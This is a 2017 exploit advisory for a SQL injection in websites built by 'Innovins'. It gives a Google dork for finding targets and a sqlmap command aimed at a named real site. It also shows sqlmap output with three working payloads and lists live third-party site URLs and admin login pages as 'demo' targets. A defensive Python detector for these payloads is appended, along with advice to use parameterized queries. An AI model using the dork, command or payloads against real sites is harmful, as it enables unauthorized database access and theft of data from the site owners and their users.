Innovins SQL Injection Vulnerability



[CODE]#################################################################################
# Exploit Title: Innovins SQL Injection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:"Developed by Innovins" & inurl:id=
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-09-05
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################
Tutorial :
[+] Dorking in Google or other search engine
[+] Open target
[+] Sqlmap and manual

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :
http://www.charlstondsouza.com/event1.php?id=11
http://www.pehl.co.in/page.php?id=17
http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php
http://pehl.co.in/admin/login.php
http://www.sunrich.co.in/admin

Note: Look in the source code to find the admin panel
References:
http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
https://cxsecurity.com/issue/WLB-2017090029

[/CODE]
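
Detection counterpart to the sqlmap output above, as an added example that is not part of the original advisory: it normalizes a logged query string (URL decoding, `/**/` comments from `space2comment`, mixed case from `randomcase`) and matches the three payload types listed. The log lines are constructed samples, and the function names (`normalize`, `classify`, `scan`) are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Patterns derived from the three payload types in the sqlmap output above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\brlike\s*\(\s*select\s*\(\s*case\s+when\b"),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\s+(?:null|concat\s*\()"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(query):
    """Undo URL encoding, space2comment (/**/ as space) and randomcase."""
    decoded = unquote_plus(unquote_plus(query))  # second pass catches double encoding
    decoded = INLINE_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()

def classify(query):
    """Return the names of all signatures that match one query string."""
    text = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(log_lines):
    """Return (client, path, techniques) for each suspicious access-log line."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m or "?" not in m.group(2):
            continue
        path, query = m.group(2).split("?", 1)
        hits = classify(query)
        if hits:
            findings.append((m.group(1), path, hits))
    return findings

# Constructed sample log lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2017:10:00:01 +0000] "GET /event1.php?id=11 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Sep/2017:10:02:11 +0000] "GET /event1.php?id=11%27/**/rLiKe/**/(SeLeCt/**/(cAsE/**/wHeN/**/(3513=3513)/**/tHeN/**/11/**/eLsE/**/0x28/**/eNd))/**/aNd/**/%27vQij%27=%27vQij HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Sep/2017:10:02:12 +0000] "GET /event1.php?id=11%27%20AND%20(SELECT%201488%20FROM(SELECT%20COUNT(*),CONCAT(0x716a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27QJBd%27=%27QJBd HTTP/1.1" 500 312',
    '198.51.100.7 - - [05/Sep/2017:10:02:13 +0000] "GET /event1.php?id=-2119%27+UNION+ALL+SELECT+NULL,CONCAT(0x716a6b6271,0x7171706a71),NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 4890',
    '192.0.2.44 - - [05/Sep/2017:10:05:40 +0000] "GET /article.php?id=2&q=trade+union+select+committee HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, path, hits in scan(SAMPLE_LOG):
        print(client, path, ", ".join(hits))
```

Because the command uses `--random-agent`, matching on the User-Agent header would miss this traffic. The durable fix on the application side is to bind `id` as a query parameter instead of concatenating it into the SQL string.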
